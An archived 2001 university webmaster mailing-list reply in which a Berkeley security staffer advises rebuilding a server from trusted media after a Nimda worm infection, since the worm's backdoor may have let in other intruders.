From: Mike Friedman (mikef@ack.berkeley.edu)
Date: Thu Sep 20 2001 - 10:56:34 PDT
On Wed Sep 19 22:36:25 2001, International & Area Studies said:
> After updates are applied, is there anything else we should do? McAffee is
> catching and deleting the Nimda virus on one of our servers. I did find
> the root.exe on the same server. I used the Code Red cleanup utility to
> erase it. It can be found at the following site...
> http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878
> (If you do this, be sure and restart www publishing services afterwards)
> Does this mean I should still rebuild the whole system?
Unfortunately, yes. The NIMDA worm leaves behind a 'backdoor' by which
any intruder could get into your system and further compromise it in other,
unknown, ways. This means that even though you have now cleaned out the
NIMDA-related files, there may be other things that were left on your system
by a subsequent attacker who got in while the NIMDA backdoor was in place.
The only way to be sure is to rebuild the system from a trusted source (eg,
CD media).
Mike
----------------------------------------------------------------------------
Mike Friedman mikef@ack.Berkeley.EDU
System & Network Security +1-510-642-1410
University of California at Berkeley http://ack.Berkeley.EDU/~mikef
----------------------------------------------------------------------------
-----------------------------------------------------------------------
The following was automatically added to this message by the list server:
Webnet information is available at <URL:http://wss.berkeley.edu/webnet/>.
This archive was generated by hypermail 2b29 : Thu Sep 20 2001 - 10:59:20 PDT